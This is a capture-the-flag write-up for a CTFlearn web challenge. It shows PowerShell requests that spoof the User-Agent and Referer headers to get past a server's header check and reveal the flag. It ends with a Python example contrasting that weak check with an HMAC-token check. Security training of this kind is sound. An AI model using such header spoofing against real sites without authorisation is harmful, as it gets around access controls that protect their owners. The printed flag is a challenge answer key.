CTFLEARN: Don’t Bump Your Head(er) Writeup

Prompt: Try to bypass my security measure on this site! http://165.227.106.113/header.php

Based on the prompt and title, we can safely assume we will need to craft a web request to pull the flag out of the site. Headers are the part of the HTTP protocol that lets clients and servers exchange additional information about a request or response. They typically carry metadata such as the content type, user agent, authentication information, and other details that help the server process the request or the client interpret the response. Given the title of the challenge, headers are a good place to start.

To start I ran the following command in PowerShell:

Invoke-WebRequest http://165.227.106.113/header.php

This produced the following output:

StatusCode        : 200
StatusDescription : OK
Content           : Sorry, it seems as if your user agent is not correct, in order to access this website. The one you supplied is: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) 
                    WindowsPowerShell/5.1.19041.1682
                    <!-- S...
RawContent        : HTTP/1.1 200 OK
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Content-Type: text/html
                    Date: Thu, 28 Jul 2022 00:44:34 GMT
                    Server: nginx/1.4.6 (Ubuntu)
                    X-Powered-By: PHP/5.5.9-1ubuntu4.22
                    
                    ...
Forms             : {}
Headers           : {[Transfer-Encoding, chunked], [Connection, keep-alive], [Content-Type, text/html], [Date, Thu, 28 Jul 2022 00:44:34 GMT]...}
Images            : {}
InputFields       : {}
Links             : {}
ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 221

I wasn’t able to see the entirety of the Content section so I assigned this to a variable with the following:

$request = Invoke-WebRequest http://165.227.106.113/header.php

And then viewed the entire Content section with the following:

$request.Content

This produces the full message:

Sorry, it seems as if your user agent is not correct, in order to access this website. The one you supplied is: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
<!-- Sup3rS3cr3tAg3nt  -->

The “Sup3rS3cr3tAg3nt” comment on the page seems to be a vital clue. With that info, we passed the following request:

Invoke-WebRequest http://165.227.106.113/header.php -UserAgent Sup3rS3cr3tAg3nt

This outputs:

StatusCode        : 200
StatusDescription : OK
Content           : Sorry, it seems as if you did not just come from the site, "awesomesauce.com".
                    <!-- Sup3rS3cr3tAg3nt  -->
                    
RawContent        : HTTP/1.1 200 OK
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Content-Type: text/html
                    Date: Thu, 28 Jul 2022 00:49:12 GMT
                    Server: nginx/1.4.6 (Ubuntu)
                    X-Powered-By: PHP/5.5.9-1ubuntu4.22
                    
                    ...
Forms             : {}
Headers           : {[Transfer-Encoding, chunked], [Connection, keep-alive], [Content-Type, text/html], [Date, Thu, 28 Jul 2022 00:49:12 GMT]...}
Images            : {}
InputFields       : {}
Links             : {}
ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 106

From this message we can assume the server requires the request to appear to come from “awesomesauce.com”, which is what the Referer header conveys. We can add that header to the request with the following command:

Invoke-WebRequest http://165.227.106.113/header.php -UserAgent Sup3rS3cr3tAg3nt -Headers @{ Referer='awesomesauce.com' }

This returns the following output, which reveals the flag:

StatusCode        : 200
StatusDescription : OK
Content           : Here is your flag: flag{did_this_m3ss_with_y0ur_h34d}
                    <!-- Sup3rS3cr3tAg3nt  -->
                    
RawContent        : HTTP/1.1 200 OK
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Content-Type: text/html
                    Date: Thu, 28 Jul 2022 00:50:38 GMT
                    Server: nginx/1.4.6 (Ubuntu)
                    X-Powered-By: PHP/5.5.9-1ubuntu4.22
                    
                    ...
Forms             : {}
Headers           : {[Transfer-Encoding, chunked], [Connection, keep-alive], [Content-Type, text/html], [Date, Thu, 28 Jul 2022 00:50:38 GMT]...}
Images            : {}
InputFields       : {}
Links             : {}
ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 81

Flag: flag{did_this_m3ss_with_y0ur_h34d}

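Key Takeaway: The User-Agent header is sent in a request to identify the requester, and a server can use it to return output meant only for specific requesters. Both the User-Agent and the Referer are set by the client, as the requests above show, so checking them does not restrict who can reach that output.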
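
The takeaway above as an added example, not code from the challenge or its author: header_gate reconstructs the check the server appears to make, judging only from its responses, next to one possible replacement that verifies an HMAC token. The function names, the token format, the key and the substring Referer match are all assumptions made for illustration.

```python
import hashlib
import hmac

# Values the challenge server appears to check, read off its responses in the
# writeup. The server's real code is not on the page; this is a reconstruction.
EXPECTED_AGENT = "Sup3rS3cr3tAg3nt"
EXPECTED_REFERER = "awesomesauce.com"
KEY = b"constructed-demo-key"  # constructed; a real key stays on the server


def header_gate(headers):
    """Weak gate: both inputs are headers the client is free to set."""
    if headers.get("User-Agent", "") != EXPECTED_AGENT:
        return "Sorry, it seems as if your user agent is not correct"
    # Substring match is an assumption; the page does not show the comparison.
    if EXPECTED_REFERER not in headers.get("Referer", ""):
        return "Sorry, it seems as if you did not just come from the site"
    return "Here is your flag"


def _mac(server_key, user):
    return hmac.new(server_key, user.encode(), hashlib.sha256).hexdigest()


def issue_token(server_key, user):
    """Server side, after a real login: 'user.mac' (hypothetical format)."""
    return f"{user}.{_mac(server_key, user)}"


def token_gate(headers, server_key):
    """Stronger gate: needs a MAC that cannot be computed without the key."""
    value = headers.get("Authorization", "")
    if not value.startswith("Bearer "):
        return "401 Unauthorized"
    user, _, mac = value[len("Bearer "):].rpartition(".")
    # Constant-time comparison of the presented MAC with the expected one.
    if user and hmac.compare_digest(mac.encode(), _mac(server_key, user).encode()):
        return "Here is your flag"
    return "401 Unauthorized"


if __name__ == "__main__":
    # Constructed request headers, equivalent to the final command above.
    spoofed = {"User-Agent": EXPECTED_AGENT, "Referer": EXPECTED_REFERER}
    print("header_gate:", header_gate(spoofed))
    print("token_gate :", token_gate(spoofed, KEY))
    good = {"Authorization": "Bearer " + issue_token(KEY, "alice")}
    print("token_gate :", token_gate(good, KEY))
```

The header-only request passes header_gate and is rejected by token_gate, because the token depends on a key the client never receives.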
